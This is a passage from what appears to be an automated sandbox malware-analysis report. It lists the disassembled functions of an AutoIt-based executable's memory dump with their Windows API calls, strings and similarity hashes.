Instruction Fuzzy Hash: 5D41DC31E00209DFCB04DFA9C8958BEBBB5FF59725F10402AE905E7291E7749D89CBA0

Function 0084D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0084D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0084D13A

Strings

|, xrefs: 0084D10B

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: d59b7a3b8137568c42b23f54ef4f5df7d678187c15d4435cd3abc70919694837
Instruction ID: abdff34fc8a1ab5e24c5977306b283e09f1f4863fd60204355ff8ce69dfab956
Opcode Fuzzy Hash: d59b7a3b8137568c42b23f54ef4f5df7d678187c15d4435cd3abc70919694837
Instruction Fuzzy Hash: 2B311D75D00219EBCF15EFA4CC89AEEBFB9FF04304F10001AF915A6266E735AA56DB50

Function 0086356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00863621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0086365C

Strings

static, xrefs: 008635BC

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: bef2258e310f081c92f26f992eb79f93d62ee829688dc4d9f71ea7c481aa3228
Instruction ID: 2e86bddc8066647d38be04947cd5ffe61f1a2ea793ac07481d915124e4cbabe4
Opcode Fuzzy Hash: bef2258e310f081c92f26f992eb79f93d62ee829688dc4d9f71ea7c481aa3228
Instruction Fuzzy Hash: 9F319E71100204AEDB109F68DC85EFB73A9FF98724F01961AF9A5D7290DA74AD81D760

Function 00864537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 0086461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00864634

Strings

', xrefs: 0086458E

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 015681ca7bc3d15d6af35395adc1de5368d40f0c1981409a0dd14b6fc777e62f
Instruction ID: e527fa9493f2ff681325843f4d67bd2bc026d088611f9c88c3f559614fe60df5
Opcode Fuzzy Hash: 015681ca7bc3d15d6af35395adc1de5368d40f0c1981409a0dd14b6fc777e62f
Instruction Fuzzy Hash: 76311674A0120A9FEF14CFA9C984ADEBBB5FB19300F15506AE905EB341D770A941CF90

Function 008631EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0086327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00863287

Strings

Combobox, xrefs: 00863249

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 59d972e87ac77e1fb93eaef1f4da3d3d6e25d148fcb352c6304b98e88d408a6e
Instruction ID: 38c5fa6538f510044eb43250ddd4ae03fb4b3fb8d533e955d66296f3e1c803fa
Opcode Fuzzy Hash: 59d972e87ac77e1fb93eaef1f4da3d3d6e25d148fcb352c6304b98e88d408a6e
Instruction Fuzzy Hash: C311E271300208BFFF219E54DC95EBB37AAFB943A5F120128F928E7390D6719D518760

Function 00863710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 007D600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 007D604C
Part of subcall function 007D600E: GetStockObject.GDI32(00000011), ref: 007D6060
Part of subcall function 007D600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 007D606A

GetWindowRect.USER32(00000000,?), ref: 0086377A
GetSysColor.USER32(00000012), ref: 00863794

Strings

static, xrefs: 00863757

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 1d16c1fb0a30e1b288b8f206bfb8813a40b7c6b91b6e8ba83e17aec25f8d4794
Instruction ID: 65589b951ec83d629b1ea7e4c64f1b39f103202e7add1ea0b7f54a0884232698
Opcode Fuzzy Hash: 1d16c1fb0a30e1b288b8f206bfb8813a40b7c6b91b6e8ba83e17aec25f8d4794
Instruction Fuzzy Hash: FB113AB2610209AFDF00DFA8CC46EFA7BB8FB09354F014525F9A6E2250E775E8519B50

Function 0084CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0084CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0084CDA6

Strings

<local>, xrefs: 0084CD66

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 77a7dea11a3774b9d34040bc379d33d3a6661f8559d76017082c8dbea1f74959
Instruction ID: d4328d8dfe1bb9982fdb29aeab7a9632c7c1fa46116c08201cffd82637a1ad90
Opcode Fuzzy Hash: 77a7dea11a3774b9d34040bc379d33d3a6661f8559d76017082c8dbea1f74959
Instruction Fuzzy Hash: 6811C671A06639BAD7B84B668C45FF7BE6CFF127A4F004226B159C3190D7749840D6F0

Function 00863429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 008634AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008634BA

Strings

edit, xrefs: 0086348F

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 32cb5fab25de1a871df1739e9fff7888b8e0ba30927f8f9ef277ccc70dc01c7f
Instruction ID: 3cb7af01e1cef085d26b67994ed9f27612b354415e5a05b1a09b679a04b890af
Opcode Fuzzy Hash: 32cb5fab25de1a871df1739e9fff7888b8e0ba30927f8f9ef277ccc70dc01c7f
Instruction Fuzzy Hash: C5119D71100108AAEB114E64DC44EBA776AFB25378F524324FA61D31E0CB75DD519758

Function 00836C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD

CharUpperBuffW.USER32(?,?,?), ref: 00836CB6
_wcslen.LIBCMT ref: 00836CC2

Strings

STOP, xrefs: 00836CBC, 00836CC1

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 0c9ea58b03aa33c43f05ccd61f28a7358cc6ee9881424c74658bac5c01699777
Instruction ID: d188a6f79b03e0234fbad60d711ff2ec1d6c0c9af5680c7fb83a4d551a891295
Opcode Fuzzy Hash: 0c9ea58b03aa33c43f05ccd61f28a7358cc6ee9881424c74658bac5c01699777
Instruction Fuzzy Hash: E6010832A00526ABCB209FBDDC448BF77B4FBA0714B004529E452D6291FA35D811C790

Function 00831CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD

Part of subcall function 00833CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00833CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00831D4C

Strings

ComboBox, xrefs: 00831CEB
ListBox, xrefs: 00831D16

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 940e688f3b3bbdda93bf4a6ebe06fc637c1cee6306ff5e3419f675e9153a6c6c
Instruction ID: 0f62113e80fa93124d3b70254da6ac104f5afa58c13cf3291d3f80e17001fbc7
Opcode Fuzzy Hash: 940e688f3b3bbdda93bf4a6ebe06fc637c1cee6306ff5e3419f675e9153a6c6c
Instruction Fuzzy Hash: 6A01D871601218AB8F04EBA4DC59CFE7778FB97750F44051AF872A73C1EB38590887A0

Function 00831BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD

Part of subcall function 00833CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00833CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00831C46

Strings

ComboBox, xrefs: 00831BE5
ListBox, xrefs: 00831C10

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: fa4bcffafb753f7a618e2c6b280d8a41f69264f6946ef16e03b3289092635bed
Instruction ID: 040fd97d71997e536b64fb58f0c189ec86be6f6a7286e07bde82f5535aac9e74
Opcode Fuzzy Hash: fa4bcffafb753f7a618e2c6b280d8a41f69264f6946ef16e03b3289092635bed
Instruction Fuzzy Hash: C301F771780108A6CF04EBA0C9599FF77A8FB61740F14101AB516B3381EA249E0997F1

Function 00831C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD

Part of subcall function 00833CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00833CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00831CC8

Strings

ComboBox, xrefs: 00831C69
ListBox, xrefs: 00831C94

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 1ba17d993739df08e710ea2d8968e9427e4a346fbac03da45532d632d990b827
Instruction ID: 9f002af6d48010537b3d4df552b6558c16b190cea24d044658933a8e40177856
Opcode Fuzzy Hash: 1ba17d993739df08e710ea2d8968e9427e4a346fbac03da45532d632d990b827
Instruction Fuzzy Hash: 5901D671780118A7CF14FBA4CA09AFE77A8FB51740F141016B906F3381EA649F0AD6B2

Function 0085747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00857493
_wcslen.LIBCMT ref: 008574B9

Strings

3, 3, 16, 1, xrefs: 00857483

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 205218e6966442fd9e6a950f14e114d850bd197d821ab6f2d4cbc4b1d4599475
Instruction ID: 9675db6a4dd30b16ad6064c79db4dee670c2d173874c4787de4abcbe1384f9cb
Opcode Fuzzy Hash: 205218e6966442fd9e6a950f14e114d850bd197d821ab6f2d4cbc4b1d4599475
Instruction Fuzzy Hash: 9DE02B42314220A192312279BCC597F5689EFC5751714182FFE85C2366EAD89D9193A5

Function 00830B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00830B23

Strings

Error allocating memory., xrefs: 00830B1C
AutoIt, xrefs: 00830B17

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 77e72920b57e7733420ee043eb3a94cf6aa19ea0ba7ec6ddad5133672782ad5b
Instruction ID: 491999daea385653667b3ae9da1ba78393875e6cff37fa5f91e29466df7e9711
Opcode Fuzzy Hash: 77e72920b57e7733420ee043eb3a94cf6aa19ea0ba7ec6ddad5133672782ad5b
Instruction Fuzzy Hash: 00E0D83134534866D31036957C07F997E84EF09B20F100426F7D8D5AC38AEA245016E9

Function 007F0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 007EF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,007F0D71,?,?,?,007D100A), ref: 007EF7CE

IsDebuggerPresent.KERNEL32(?,?,?,007D100A), ref: 007F0D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,007D100A), ref: 007F0D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 007F0D7F

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 4e9d4709eefc12117568a03c72072bcca4e3eaae66325c3c91f29f50d3d8c67d
Instruction ID: b57839db8760e1984d4207629454a5a11ba9a3a095c7d83af724fc3fdacbc655
Opcode Fuzzy Hash: 4e9d4709eefc12117568a03c72072bcca4e3eaae66325c3c91f29f50d3d8c67d
Instruction Fuzzy Hash: 29E06D743003518BD7209FB8E4083667BE4BB04744F01892DEA82C6B52DBB9E4448BD1

Function 00843017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0084302F
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00843044

Strings

aut, xrefs: 00843038

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 9ed3724a25a9c4eae5b0fba1afb335edecd50e40022a6de77d2bce4d4b7b5622
Instruction ID: 05394420553cf6d6849e509c476fd7a721a815743c1c37c917db2cd8af344fab
Opcode Fuzzy Hash: 9ed3724a25a9c4eae5b0fba1afb335edecd50e40022a6de77d2bce4d4b7b5622
Instruction Fuzzy Hash: 92D05E7250032867DA20A7A4EC0EFDB3B6CEB04750F0002A2BA95E2191EAF49984CAD0

Function 0082D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0082D220

Strings

X64, xrefs: 0082D2A8
%.3d, xrefs: 0082D22B

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 576d644d69be0dcf98704effb8952d050676df48fac4c731a37694c979e7b359
Instruction ID: 7f0bf38894debf48567309020e65e8cde77621b3852e102471b49e954011f32f
Opcode Fuzzy Hash: 576d644d69be0dcf98704effb8952d050676df48fac4c731a37694c979e7b359
Instruction Fuzzy Hash: 24D012A180926CE9CB5097E0EC498B9B77CFB08305FA48452F806D1140D628E588A761

Function 00862322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0086232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0086233F

Part of subcall function 0083E97B: Sleep.KERNELBASE ref: 0083E9F3

Strings

Shell_TrayWnd, xrefs: 00862325

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 9f6f0acf0855712f85b81bf0f742544eb6d7bfe8505610fe016f4d530af779ca
Instruction ID: 15340577211a1a5209eba29a384a207224b3ee9e3939ff326af74c707f4844b4
Opcode Fuzzy Hash: 9f6f0acf0855712f85b81bf0f742544eb6d7bfe8505610fe016f4d530af779ca
Instruction Fuzzy Hash: BCD0A932380300B6EAA4B770EC0FFD66A04BB00B00F014A06B686EA1D0C9E0A8018A44

Function 00862356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0086236C
PostMessageW.USER32(00000000), ref: 00862373

Part of subcall function 0083E97B: Sleep.KERNELBASE ref: 0083E9F3

Strings

Shell_TrayWnd, xrefs: 00862365

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 6daacdb749a5feeb57f3d2ee6d5fe08a00554d729b9e7f7a557f1039d973ee65
Instruction ID: 04b2f268cfdc88d26de5efc2af1c56b55ed464662631e0e32e2b99d863d7fcb4
Opcode Fuzzy Hash: 6daacdb749a5feeb57f3d2ee6d5fe08a00554d729b9e7f7a557f1039d973ee65
Instruction Fuzzy Hash: BAD0C9323813117AEAA4B770EC4FFD66A14BB54B10F015A16B696EA1D0D9E4A8018A58

Function 0080BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

